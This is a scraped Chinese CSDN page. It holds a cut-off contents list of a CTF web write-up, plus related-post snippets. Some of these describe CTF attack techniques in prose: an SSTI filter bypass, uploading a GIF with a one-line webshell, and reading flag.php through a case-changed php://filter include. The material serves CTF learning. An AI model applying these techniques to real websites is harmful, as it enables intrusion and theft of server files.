题号会变动可能不太一样 目录Web_php_wrong_nginx_configCommentZhuanxvWeb_python_block_chainics-02love_mathWeb_python_flask_sql_injection/register路由/edit_profile路由FilemanagerBilibiliSmartyTriangleTimeKeepereasylaravel Web_php_wrong_nginx_config 直接尝试登录,另修改isLogin=1 无效 有r
idekctf2022部分web
v2ish1yan的博客
01-26 1097
我爱idekctf!!!!有dockerfile真是太棒了因为实在不会前端,所以暂时只复现非xss的题目题目附件我都放在了。
XYCTF 2024 Web
weixin_45906533的博客
04-29 565
用户名密码:admin/asdqwe进入以后就是ssti模板注入,但是禁用了{ [ ’ "后来发现只要输入中文,就可以进行模板注入了[ 方括号被禁用可以使用__双引号单引号被禁用,使用使用request.values.a绕过此题的源码。
IO_FILE——leak 任意读
虚幻私塾
02-23 333
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 在堆题没有show函数时,我们可以用 IO_FILE 进行leak,本文就记录一下如何实现这一手法。 拿一个输出函数 puts 来说,它在源码里的表现形式为 _IO_puts 。 \_IO\_puts (const char *str) { int result = EOF;
[0xGameCTF 2023] web题解
rev1ve的博客
10-14 1866
分析一下,过滤了分号,空格,斜杠,flag。参数c不为数字,不等于1024,且转换为整数时等于1024;简单分析一下,首先会检测MIME类型是否正确,然后经过二次渲染上传到指定路径。查看页面源码,发现存在前端检测(所以命令执行要bp抓包)和告诉我们hint。(这里我最初上传的gif带一句话木马刚好没被改,就不用再添加一句话木马了)然后在posts文件夹找到,得到flag。我们这里用的是gif,我们先上传一下。bp抓包,添加命令得到flag。访问,命令执行得到flag。按照要求来,得到flag。
ctf_web_kmipn
05-06
用户用户密码 Sandiuser Sandiuser
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
技术栈python3.6 + Django 2.1.7 + 10.3.9-MariaDB or Mysql-8.0 + REST Framework 3.9.2 + xadmin + Celery + Vue部署基于ubuntu 18 LTS版本安装mysql、redis 并在setting.py中配置连接信息创建虚拟环境基于python...
华为od机试真题 — 代表团坐车(Python)
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 575
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
Python如何将字符串连接在一起并使用`join()`方法】
最新发布
qq_36253366的博客
07-19 177
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
Python每日一题:回文数
xiongxiaoxuan的博客
07-16 274
回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。给你一个整数 x ,如果 x 是一个回文整数,返回 true;否则,返回 false。解释:从左向右读, 为 -121。从右向左读, 为 121-。因此它不是一个回文数。先将整数x转化为字符串形式,判断x和它的反转形态是否完全相等。解释:从右向左读, 为 01。需注意:True和False首字母大写!提示:-231
IPython 日志秘籍:%logstate 命令全解析
2401_85812026的博客
07-17 564
logstate命令是 IPython 日志系统的重要组成部分,它帮助我们掌控日志记录的状态。通过本文的介绍,你应该对如何在 IPython 中使用%logstate查看日志状态有了更深入的理解。记住,合理利用日志系统,可以让你的数据探索过程更加透明和可追溯。本文详细介绍了 IPython 的%logstate命令,包括其基本概念、基本用法、输出解析以及实战示例。希望本文能够帮助读者更好地利用 IPython 的日志系统,优化数据探索和科学计算的工作流。记住,掌握%logstate。
ctf题目Web_php_include
07-28
回答: 这个CTF题目是一个关于PHP文件包含漏洞的题目。在给定的代码中,使用了include函数来包含一个可控的$page变量。然而,通过使用strstr函数来过滤了包含"php://"的情况。\[1\]但是,我们可以通过大小写绕过strstr函数的限制来绕过这个过滤。\[2\]另外,通过观察URL,我们可以发现存在一个名为flag.php的文件。因此,我们可以构造一个payload来读取flag.php文件的内容,例如使用php://filter伪协议来进行base64编码并读取flag.php文件的内容。\[3\] #### 引用[.reference_title] - *1* [ctf-攻防世界-webWeb_php_include](https://blog.csdn.net/m0_62619559/article/details/121345424)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ctf web 文件包含漏洞(例题)](https://blog.csdn.net/weixin_49298265/article/details/110356100)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值